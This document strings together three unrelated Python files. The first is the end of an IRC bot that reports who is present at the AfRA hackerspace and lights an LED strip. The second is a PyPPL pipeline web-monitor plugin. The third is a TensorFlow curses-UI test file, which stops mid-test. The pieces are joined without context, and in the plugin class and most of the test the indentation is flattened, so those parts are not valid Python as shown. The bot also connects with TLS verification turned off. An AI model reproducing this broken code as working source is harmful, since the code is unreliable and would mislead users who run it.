    for i in range(0, strip.numPixels()):
        strip.setPixelColor(i, colors)
        strip.setPixelColor((i + 1) % LED_COUNT, Color(0, 0, 0))
        strip.show()
        time.sleep(0.1)
    # clear pass
    for i in range(1, strip.numPixels()):
        strip.setPixelColor(i, Color(0, 0, 0))
        strip.show()
        time.sleep(0.1)
class MyOwnBot(pydle.Client):
    """IRC presence bot: answers channel/private dot-commands against the
    module-level presence registries (MAC, RFID, ETA, IRC)."""
    @asyncio.coroutine
    def on_connect(self):
        # join the space channel as soon as we are connected
        yield from self.join('#afra')
    @asyncio.coroutine
    def on_message(self, target, source, message):
        """Handle channel commands (.presence, .eta, .here, .gone, ...)."""
        global current_mac_users, current_rfid_users, current_eta_users, current_irc_users
        current_users = list(set(current_mac_users + current_rfid_users + current_irc_users))
        # don't respond to our own messages, as this leads to a positive feedback loop
        if source != self.nickname:
            if message.startswith(".presence") or message.startswith(".present"):
                formatted_eta_users = get_formatted_eta_users()
                if len(current_users) == 0 and len(formatted_eta_users) == 0:
                    yield from self.message(target, "Nobody wants to be surveilled.")
                elif len(current_users) > 0:
                    yield from self.message(target, "Now at AfRA: " + ", ".join(current_users))
                if len(formatted_eta_users) > 0:
                    yield from self.message(target, "Soon to arrive: " + ", ".join(formatted_eta_users))
            elif message.startswith(".eta"):
                # NOTE(review): always answers "Noted!" even when parsing
                # failed; the private-message handler does check the result
                register_eta(source, message)
                yield from self.message(target, "Noted!")
            elif message.startswith(".here") or message.startswith(".da"):
                register_here(source)
            elif message.startswith(".gone") or message.startswith(".weg"):
                register_gone(source)
            elif message.startswith(".clear"):
                # clear everything except IRC self-registrations
                current_mac_users = []
                current_rfid_users = []
                current_eta_users = {}
                yield from self.message(target, "Cleared")
            elif message.startswith(".purge"):
                # clear all presence data, IRC users included
                current_irc_users = []
                current_mac_users = []
                current_rfid_users = []
                current_eta_users = {}
                yield from self.message(target, "...")
            elif message.startswith(".version"):
                yield from self.message(target, get_version())
    @asyncio.coroutine
    def on_private_message(self, target, source, message):
        """Handle the same commands via private message, with feedback."""
        # NOTE(review): relies on pydle's private _nicknames attribute
        if source in self._nicknames:  # don't react to yourself
            return
        if message.startswith(".eta"):
            if register_eta(source, message):
                yield from self.message(source, "Got it, see you")
            else:
                yield from self.message(source, "Sorry, I did not understand this. Please use: .eta XXmin")
        elif message.startswith(".here") or message.startswith(".da"):
            register_here(source)
            yield from self.message(source, "Welcome, you can log out via .gone")
        elif message.startswith(".gone") or message.startswith(".weg"):
            register_gone(source)
            yield from self.message(source, "Goodbye")
        elif message.startswith(".register mac"):
            if self_register_mac(source, message):
                yield from self.message(source, "MAC registered, the update can take up to 1 minute")
            else:
                yield from self.message(source, "Sorry, I did not understand this. Please use: .register mac MAC_ADDRESS")
        elif message.startswith(".remove mac"):
            if self_remove_mac(source, message):
                yield from self.message(source, "MAC removed, the update can take up to 1 minute")
            else:
                yield from self.message(source, "Sorry, I did not understand this. Please use: .remove mac MAC_ADDRESS")
        else:
            yield from self.message(source, "Sorry, I did not understand. Reference: https://www.afra-berlin.de/dokuwiki/doku.php?id=projekte:pr3s3nce")
# ---- module state & startup (runs on import) ----
# presence registries shared between the watcher threads and the IRC bot
current_mac_users = []
current_rfid_users = []
current_eta_users = {}
current_irc_users = []
# background watchers (non-daemon threads: they keep the process alive)
threading.Thread(target=mac_tester).start()
threading.Thread(target=rfid_watcher).start()
# LED strip configuration:
LED_COUNT = 16       # Number of LED pixels.
LED_PIN = 10         # GPIO pin connected to the pixels (must support PWM!).
LED_CHANNEL = 1      # PWM Channel must correspond to chosen LED_PIN PWM!
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5          # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 100 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False   # True to invert the signal (when using NPN transistor level shift)
# NOTE(review): LED_CHANNEL is defined but not passed to the constructor —
# confirm the library default matches the wiring
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)
strip.begin()
try:
    client = MyOwnBot("pr3s3nce", realname="AfRA attendance bot")
    client.run('chat.freenode.net', tls=True, tls_verify=False)
finally:
    # NOTE(review): always exits with status 1, even on a clean shutdown
    sys.exit(1)
|
__init__.py | """Web client to monitor pipeline processes for PyPPL"""
from threading import Thread
from pathlib import Path
from flask_socketio import SocketIO
from diot import Diot
from pyppl.plugin import hookimpl
from pyppl.logger import Logger
from pyppl.config import config
from .shared import (logger, PLUGIN, DEFAULT_PORT, DEFAULT_THEME,
SOCKETIO_DEBUG, DEFAULT_KEEPALIVE,
pipeline_data)
from .app import create_app
from .sockets import create_socket
from .utils import auto_port, PipelineData
# pylint: disable=unused-argument,no-self-use
__version__ = "0.0.2"
class PyPPLWeb:
"""Web client to monitor pipeline processes for PyPPL"""
__version__ = __version__
def __init__(self):
    """Initialize plugin state; server, app, and socket objects are
    created lazily by the pyppl_init hook."""
    self.port = self.thread = self.namespace = None
    self.app = self.socketio = None
    self.pdata = pipeline_data
    self.setup()
def start_server(self):
    """Run the socketio server with the configured port; log failures
    (e.g. port already in use) instead of raising."""
    logger.info("Launching web server at port {} ...".format(self.port))
    try:
        self.socketio.run(self.app,
                          port=self.port,
                          debug=config.config.web_debug)
    except OSError as ex:
        logger.error('Failed to start server: {}'.format(ex))
def setup(self):
    """Install this plugin's default configuration values."""
    defaults = {
        'web_port': DEFAULT_PORT,
        'web_debug': SOCKETIO_DEBUG,
        'web_keepalive': DEFAULT_KEEPALIVE,
        'web_theme': DEFAULT_THEME,
    }
    for key, value in defaults.items():
        setattr(config.config, key, value)
@hookimpl
def pyppl_init(self, ppl):
    """Resolve the listening port and build the flask app + socket."""
    configured_port = config.config.web_port
    self.port = auto_port() if configured_port == 'auto' else int(configured_port)
    self.app = create_app(config.config.web_theme)
    self.socketio, self.namespace = create_socket(self.app)
@hookimpl
def pyppl_prerun(self, ppl):
    """Assemble the initial pipeline data and start the web server
    in a background thread before the pipeline runs."""
    # construct initial pipeline data for rendering
    self.pdata = PipelineData(ppl)
    self.pdata.assemble()
    # attach this to pipeline_data for sockets
    pipeline_data.pipeline = self.pdata
    # More detailed data for tab rendering
    pipeline_data.procs = {}
    #
    # This should be the same as using standard threading.Thread,
    # as we are using async_mode='threading'
    self.thread = Thread(target=self.start_server)
    # daemon: allow the thread to stop together with the main thread
    self.thread.daemon = True
    self.thread.start()
@hookimpl
def pyppl_postrun(self, ppl):
"""Try to keep alive of the server
if config.config.web_keepalive is True"""
if not config.config.web_keepalive:
return
if config.config.web_keepalive is True:
logger.info(f"Web server is still alive at port {self.port}, "
"use <Ctrl+C> to quit.")
logger.info("Pending for connection ...")
elif self.namespace.count > 0:
logger.info(f"Web server is still alive at port {self.port}, "
f"clients connected: {self.namespace.count}")
else:
logger.warning("Web server is stopping as well, "
"since no clients connected.")
# .stop only works with context
#socketio.stop()
# we just leave it to exit, since our thread is daemonic
return
self.thread.join()
@hookimpl
def proc_prerun(self, proc):
"""Initialize a proc"""
self.pdata.update_node(proc, 'init')
self.socketio.emit('pipeline_update', self.pdata.node_data(proc))
# init proc data
pipeline_data.procs[proc.shortname] = Diot()
procdata = pipeline_data.procs[proc.shortname]
procdata.jobs = [['', ''] for _ in range(proc.size)]
procdata.status = self.pdata.node_data(proc).get('status', '')
procdata.props = {
key: str(getattr(proc, key))
for key in list(proc._setcounter) + ['workdir', 'size']
}
procdata.props.workdir_abs = str(Path(procdata.props.workdir).resolve())
procdata.args = {key: str(val) for key, val in proc.args.items()}
procdata.envs = {key: str(val) for key, val in proc.envs.items()}
procdata.config = {key: str(val) for key, val in proc.config.items()}
procdata.watch = False
procdata.proc = proc.shortname
@hookimpl
def proc_postrun(self, proc, status):
"""Update the status of the whole proc"""
self.pdata.update_node(proc, status)
self.socketio.emit('pipeline_update', self.pdata.node_data(proc))
@hookimpl
def job_build(self, job):
"""Init some data for pipeline_data.procs"""
procdata = pipeline_data.procs[job.proc.shortname]
procdata.jobs[job.index] = ['init', job.rc]
if procdata.watch:
self.socketio.emit('job_status_change',
{'proc': job.proc.shortname,
'job': job.index, # 0-based
'rc': job.rc,
'status': 'init'})
if procdata.status == '':
# just in case tab of the proc has not init'ed
procdata.status = 'init'
self.socketio.emit('tab_proc_init_resp', procdata)
@hookimpl
def job_poll(self, job, status):
"""Tell pipeline_data.procs that I am running"""
if status == 'running':
procdata = pipeline_data.procs[job.proc.shortname]
prev_status = procdata.jobs[job.index][0]
procdata.jobs[job.index][0] = status
# only send once
if procdata.watch and prev_status != 'running':
self.socketio.emit('job_status_change',
{'proc': job.proc.shortname,
'job': job.index,
'rc': job.rc,
'status': status})
@hookimpl
def job_done(self, job, status):
"""Update status on the client"""
self.pdata.update_node(job.proc, status)
nodedata = self.pdata.node_data(job.proc)
self.socketio.emit('pipeline_update', nodedata)
procdata = pipeline_data.procs[job.proc.shortname]
procdata.status = nodedata.get('status', procdata.status)
procdata.jobs[job.index][0] = status
procdata.jobs[job.index][1] = job.rc
if procdata.watch:
self.socketio.emit('job_status_change',
{'proc': job.proc.shortname,
'job': job.index,
'rc': job.rc,
'status': status})
PYPPLWEB = PyPPLWeb()
|
curses_ui_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests of the curses-based CLI."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import curses
import tempfile
import threading
import numpy as np
from six.moves import queue
from tensorflow.python.debug.cli import curses_ui
from tensorflow.python.debug.cli import debugger_cli_common
from tensorflow.python.debug.cli import tensor_format
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.platform import googletest
def string_to_codes(cmd):
  """Convert a command string into a list of character key codes."""
  return list(map(ord, cmd))
def codes_to_string(cmd_code):
  """Join ASCII key codes back into a string.

  Codes >= 256 (e.g. curses special keys) are dropped.
  """
  ascii_chars = (chr(code) for code in cmd_code if code < 256)
  return "".join(ascii_chars)
class MockCursesUI(curses_ui.CursesUI):
  """Mock subclass of CursesUI that bypasses actual terminal manipulations."""

  def __init__(self,
               height,
               width,
               command_sequence=None):
    # Emulated terminal size reported by _screen_refresh_size.
    self._height = height
    self._width = width

    # Scripted input: each element is a list of key codes replayed as one
    # command by _screen_get_user_command.
    self._command_sequence = command_sequence
    self._command_counter = 0

    # The mock class has no actual textbox. So use this variable to keep
    # track of what's entered in the textbox on creation.
    self._curr_existing_command = ""

    # Observers for test.
    # Observers of screen output.
    self.unwrapped_outputs = []
    self.wrapped_outputs = []
    self.scroll_messages = []
    self.output_array_pointer_indices = []
    self.output_pad_rows = []

    # Observers of command textbox.
    self.existing_commands = []

    # Observer for tab-completion candidates.
    self.candidates_lists = []

    # Observer for the main menu.
    self.main_menu_list = []

    # Observer for toast messages.
    self.toasts = []

    curses_ui.CursesUI.__init__(self)

    # Override the default path to the command history file to avoid test
    # concurrency issues.
    self._command_history_store = debugger_cli_common.CommandHistory(
        history_file_path=tempfile.mktemp())

  # Below, override the _screen_ prefixed member methods that interact with the
  # actual terminal, so that the mock can run in a terminal-less environment.
  # TODO(cais): Search for a way to have a mock terminal object that behaves
  # like the actual terminal, so that we can test the terminal interaction
  # parts of the CursesUI class.
  def _screen_init(self):
    pass

  def _screen_refresh_size(self):
    # Report the emulated size instead of querying curses.
    self._max_y = self._height
    self._max_x = self._width

  def _screen_launch(self, enable_mouse_on_start):
    self._mouse_enabled = enable_mouse_on_start

  def _screen_terminate(self):
    pass

  def _screen_refresh(self):
    pass

  def _screen_create_command_window(self):
    pass

  def _screen_create_command_textbox(self, existing_command=None):
    """Override to insert observer of existing commands.

    Used in testing of history navigation and tab completion.

    Args:
      existing_command: Command string entered to the textbox at textbox
        creation time. Note that the textbox does not actually exist in this
        mock subclass. This method only keeps track of and records the state.
    """
    self.existing_commands.append(existing_command)
    self._curr_existing_command = existing_command

  def _screen_new_output_pad(self, rows, cols):
    # No real curses pad exists; return a placeholder object.
    return "mock_pad"

  def _screen_add_line_to_output_pad(self, pad, row, txt, color_segments=None):
    pass

  def _screen_draw_text_line(self, row, line, attr=curses.A_NORMAL, color=None):
    pass

  def _screen_scroll_output_pad(self, pad, viewport_top, viewport_left,
                                screen_location_top, screen_location_left,
                                screen_location_bottom, screen_location_right):
    pass

  def _screen_get_user_command(self):
    # Replay the next scripted command, feeding its key codes one at a time
    # to the textbox keypress handler.
    command = self._command_sequence[self._command_counter]

    self._command_key_counter = 0
    for c in command:
      if c == curses.KEY_RESIZE:
        # Special case for simulating a terminal resize event in curses.
        # command[1] and command[2] carry the new height and width.
        self._height = command[1]
        self._width = command[2]
        self._on_textbox_keypress(c)
        self._command_counter += 1
        return ""
      elif c == curses.KEY_MOUSE:
        # Scripted mouse click: command[1]/command[2] are the coordinates.
        mouse_x = command[1]
        mouse_y = command[2]
        self._command_counter += 1
        self._textbox_curr_terminator = c
        return self._fetch_hyperlink_command(mouse_x, mouse_y)
      else:
        y = self._on_textbox_keypress(c)

        self._command_key_counter += 1
        # Stop feeding keys once the CLI terminator (Enter) is hit.
        if y == curses_ui.CursesUI.CLI_TERMINATOR_KEY:
          break

    self._command_counter += 1

    # Take into account pre-existing string automatically entered on textbox
    # creation.
    return self._curr_existing_command + codes_to_string(command)

  def _screen_getmouse(self):
    # Replay the next scripted mouse position as a BUTTON1 click event.
    output = (0, self._mouse_xy_sequence[self._mouse_counter][0],
              self._mouse_xy_sequence[self._mouse_counter][1], 0,
              curses.BUTTON1_CLICKED)
    self._mouse_counter += 1
    return output

  def _screen_gather_textbox_str(self):
    # Return only the keys fed so far for the current command.
    return codes_to_string(self._command_sequence[self._command_counter]
                           [:self._command_key_counter])

  def _scroll_output(self, direction, line_index=None):
    """Override to observe screen output.

    This method is invoked after every command that generates a new screen
    output and after every keyboard triggered screen scrolling. Therefore
    it is a good place to insert the observer.

    Args:
      direction: which direction to scroll.
      line_index: (int or None) Optional line index to scroll to. See doc string
        of the overridden method for more information.
    """
    curses_ui.CursesUI._scroll_output(self, direction, line_index=line_index)

    # Record the post-scroll state so tests can inspect it.
    self.unwrapped_outputs.append(self._curr_unwrapped_output)
    self.wrapped_outputs.append(self._curr_wrapped_output)
    self.scroll_messages.append(self._scroll_info)
    self.output_array_pointer_indices.append(self._output_array_pointer_indices)
    self.output_pad_rows.append(self._output_pad_row)

  def _display_main_menu(self, output):
    # Delegate to the real implementation, then record the resulting menu.
    curses_ui.CursesUI._display_main_menu(self, output)

    self.main_menu_list.append(self._main_menu)

  def _screen_render_nav_bar(self):
    pass

  def _screen_render_menu_pad(self):
    pass

  def _display_candidates(self, candidates):
    # Record tab-completion candidates after the real display logic runs.
    curses_ui.CursesUI._display_candidates(self, candidates)

    self.candidates_lists.append(candidates)

  def _toast(self, message, color=None, line_index=None):
    # Record toast messages after the real toast logic runs.
    curses_ui.CursesUI._toast(self, message, color=color, line_index=line_index)

    self.toasts.append(message)
class CursesTest(test_util.TensorFlowTestCase):
_EXIT = string_to_codes("exit\n")
def _babble(self, args, screen_info=None):
ap = argparse.ArgumentParser(
description="Do babble.", usage=argparse.SUPPRESS)
ap.add_argument(
"-n",
"--num_times",
dest="num_times",
type=int,
default=60,
help="How many times to babble")
ap.add_argument(
"-l",
"--line",
dest="line",
type=str,
default="bar",
help="The content of each line")
ap.add_argument(
"-k",
"--link",
dest="link",
action="store_true",
help="Create a command link on each line")
ap.add_argument(
"-m",
"--menu",
dest="menu",
action="store_true",
help="Create a menu for testing")
parsed = ap.parse_args(args)
lines = [parsed.line] * parsed.num_times
font_attr_segs = {}
if parsed.link:
for i in range(len(lines)):
font_attr_segs[i] = [(
0,
len(lines[i]),
debugger_cli_common.MenuItem("", "babble"),)]
annotations = {}
if parsed.menu:
menu = debugger_cli_common.Menu()
menu.append(
debugger_cli_common.MenuItem("babble again", "babble"))
menu.append(
debugger_cli_common.MenuItem("ahoy", "ahoy", enabled=False))
annotations[debugger_cli_common.MAIN_MENU_KEY] = menu
output = debugger_cli_common.RichTextLines(
lines, font_attr_segs=font_attr_segs, annotations=annotations)
return output
def _print_ones(self, args, screen_info=None):
ap = argparse.ArgumentParser(
description="Print all-one matrix.", usage=argparse.SUPPRESS)
ap.add_argument(
"-s",
"--size",
dest="size",
type=int,
default=3,
help="Size of the matrix. For example, of the value is 3, "
"the matrix will have shape (3, 3)")
parsed = ap.parse_args(args)
m = np.ones([parsed.size, parsed.size])
return tensor_format.format_tensor(m, "m")
def testInitialization(self):
ui = MockCursesUI(40, 80)
self.assertEqual(0, ui._command_pointer)
self.assertEqual([], ui._active_command_history)
self.assertEqual("", ui._pending_command)
def testCursesUiInChildThreadStartsWithoutException(self):
result = queue.Queue()
def child_thread():
try:
MockCursesUI(40, 80)
except ValueError as e:
result.put(e)
t = threading.Thread(target=child_thread)
t.start()
t.join()
self.assertTrue(result.empty())
def testRunUIExitImmediately(self):
"""Make sure that the UI can exit properly after launch."""
ui = MockCursesUI(40, 80, command_sequence=[self._EXIT])
ui.run_ui()
# No screen output should have happened.
self.assertEqual(0, len(ui.unwrapped_outputs))
def testRunUIEmptyCommand(self):
"""Issue an empty command then exit."""
ui = MockCursesUI(40, 80, command_sequence=[[], self._EXIT])
ui.run_ui()
# Empty command should not lead to any screen output.
self.assertEqual(0, len(ui.unwrapped_outputs))
def testRunUIInvalidCommandPrefix(self):
"""Handle an unregistered command prefix."""
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("foo\n"), self._EXIT])
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["ERROR: Invalid command prefix \"foo\""],
ui.unwrapped_outputs[0].lines)
# TODO(cais): Add explanation for the 35 extra lines.
self.assertEqual(["ERROR: Invalid command prefix \"foo\""],
ui.wrapped_outputs[0].lines[:1])
# A single line of output should not have caused scrolling.
self.assertNotIn("Scroll", ui.scroll_messages[0])
self.assertIn("Mouse:", ui.scroll_messages[0])
def testRunUIInvalidCommandSyntax(self):
"""Handle a command with invalid syntax."""
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble -z\n"), self._EXIT])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertIn("Mouse:", ui.scroll_messages[0])
self.assertEqual(
["Syntax error for command: babble", "For help, do \"help babble\""],
ui.unwrapped_outputs[0].lines)
def testRunUIScrollTallOutputPageDownUp(self):
"""Scroll tall output with PageDown and PageUp."""
# Use PageDown and PageUp to scroll back and forth a little before exiting.
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble\n"), [curses.KEY_NPAGE] * 2 +
[curses.KEY_PPAGE] + self._EXIT])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(4, len(ui.wrapped_outputs))
self.assertEqual(4, len(ui.scroll_messages))
# Before scrolling.
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
# Initial scroll: At the top.
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
self.assertIn("Mouse:", ui.scroll_messages[0])
# After 1st scrolling (PageDown).
# The screen output shouldn't have changed. Only the viewport should.
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
self.assertIn("Scroll (PgDn/PgUp): 1.69%", ui.scroll_messages[1])
self.assertIn("Mouse:", ui.scroll_messages[1])
# After 2nd scrolling (PageDown).
self.assertIn("Scroll (PgDn/PgUp): 3.39%", ui.scroll_messages[2])
self.assertIn("Mouse:", ui.scroll_messages[2])
# After 3rd scrolling (PageUp).
self.assertIn("Scroll (PgDn/PgUp): 1.69%", ui.scroll_messages[3])
self.assertIn("Mouse:", ui.scroll_messages[3])
def testCutOffTooManyOutputLines(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble -n 20\n"), self._EXIT])
# Modify max_output_lines so that this test doesn't use too much time or
# memory.
ui.max_output_lines = 10
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(["bar"] * 10 + ["Output cut off at 10 lines!"],
ui.wrapped_outputs[0].lines[:11])
def testRunUIScrollTallOutputEndHome(self):
"""Scroll tall output with PageDown and PageUp."""
# Use End and Home to scroll a little before exiting to test scrolling.
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble\n"),
[curses.KEY_END] * 2 + [curses.KEY_HOME] + self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(4, len(ui.wrapped_outputs))
self.assertEqual(4, len(ui.scroll_messages))
# Before scrolling.
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
# Initial scroll: At the top.
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
# After 1st scrolling (End).
self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[1])
# After 2nd scrolling (End).
self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[2])
# After 3rd scrolling (Hhome).
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[3])
def testRunUIWithInitCmd(self):
"""Run UI with an initial command specified."""
ui = MockCursesUI(40, 80, command_sequence=[self._EXIT])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui(init_command="babble")
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
def testCompileHelpWithoutHelpIntro(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"), self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[0].lines[:4])
def testCompileHelpWithHelpIntro(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"), self._EXIT])
help_intro = debugger_cli_common.RichTextLines(
["This is a curses UI.", "All it can do is 'babble'.", ""])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.set_help_intro(help_intro)
ui.run_ui()
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(
help_intro.lines + ["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[0].lines[:7])
def testCommandHistoryNavBackwardOnce(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
[curses.KEY_UP], # Hit Up and Enter.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(2, len(ui.unwrapped_outputs))
for i in [0, 1]:
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[i].lines[:4])
def testCommandHistoryNavBackwardTwice(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
string_to_codes("babble\n"),
[curses.KEY_UP],
[curses.KEY_UP], # Hit Up twice and Enter.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
# The 1st and 3rd outputs are for command "help".
for i in [0, 2]:
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[i].lines[:4])
# The 2nd output is for command "babble".
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
def testCommandHistoryNavBackwardOverLimit(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
string_to_codes("babble\n"),
[curses.KEY_UP],
[curses.KEY_UP],
[curses.KEY_UP], # Hit Up three times and Enter.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
# The 1st and 3rd outputs are for command "help".
for i in [0, 2]:
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[i].lines[:4])
# The 2nd output is for command "babble".
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
def testCommandHistoryNavBackwardThenForward(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
string_to_codes("babble\n"),
[curses.KEY_UP],
[curses.KEY_UP],
[curses.KEY_DOWN], # Hit Up twice and Down once.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
# The 1st output is for command "help".
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[0].lines[:4])
# The 2nd and 3rd outputs are for command "babble".
for i in [1, 2]:
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[i].lines)
def testCommandHistoryPrefixNavBackwardOnce(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 1\n"),
string_to_codes("babble -n 10\n"),
string_to_codes("help\n"),
string_to_codes("b") + [curses.KEY_UP], # Navigate with prefix.
string_to_codes("\n"),
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(["bar"], ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[1].lines)
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[2].lines[:4])
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[3].lines)
def testTerminalResize(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble\n"),
[curses.KEY_RESIZE, 100, 85], # Resize to [100, 85]
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The resize event should have caused a second screen output event.
self.assertEqual(2, len(ui.unwrapped_outputs))
self.assertEqual(2, len(ui.wrapped_outputs))
self.assertEqual(2, len(ui.scroll_messages))
# The 1st and 2nd screen outputs should be identical (unwrapped).
self.assertEqual(ui.unwrapped_outputs[0], ui.unwrapped_outputs[1])
# The 1st scroll info should contain scrolling, because the screen size
# is less than the number of lines in the output.
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
def testTabCompletionWithCommonPrefix(self):
# Type "b" and trigger tab completion.
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("b\t"), string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["ba"])
ui.run_ui()
# The automatically registered exit commands "exit" and "quit" should not
# appear in the tab completion candidates because they don't start with
# "b".
self.assertEqual([["ba", "babble"]], ui.candidates_lists)
# "ba" is a common prefix of the two candidates. So the "ba" command should
# have been issued after the Enter.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
def testTabCompletionEmptyTriggerWithoutCommonPrefix(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["a"])
# Use a different alias "a" instead.
ui.run_ui()
# The manually registered command, along with the automatically registered
# exit commands should appear in the candidates.
self.assertEqual(
[["a", "babble", "cfg", "config", "exit", "h", "help", "m", "mouse",
"quit"]], ui.candidates_lists)
# The two candidates have no common prefix. So no command should have been
# issued.
self.assertEqual(0, len(ui.unwrapped_outputs))
self.assertEqual(0, len(ui.wrapped_outputs))
self.assertEqual(0, len(ui.scroll_messages))
def testTabCompletionNonemptyTriggerSingleCandidate(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("b\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["a"])
ui.run_ui()
# There is only one candidate, so no candidates should have been displayed.
# Instead, the completion should have been automatically keyed in, leading
# to the "babble" command being issue.
self.assertEqual([[]], ui.candidates_lists)
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
def testTabCompletionNoMatch(self):
ui = MockCursesUI(
40,
80,
